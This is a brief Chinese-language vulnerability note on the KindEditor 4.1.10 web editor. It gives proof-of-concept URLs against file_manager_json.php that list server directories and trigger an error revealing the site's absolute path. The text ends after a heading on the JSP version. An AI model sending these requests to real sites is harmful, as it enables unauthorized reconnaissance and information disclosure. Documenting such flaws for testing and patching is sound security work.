一、Kindeditor列目录漏洞
测试环境:KindEditor 4.1.10
PoC:http://localhost/kindeditor/php/file_manager_json.php?path=/var/www/html/
报错信息泄露网站绝对路径:http://localhost/kindeditor/php/file_manager_json.php?path=/
二、KindEditor v4.1.10 JSP版没有文件上传漏洞
......
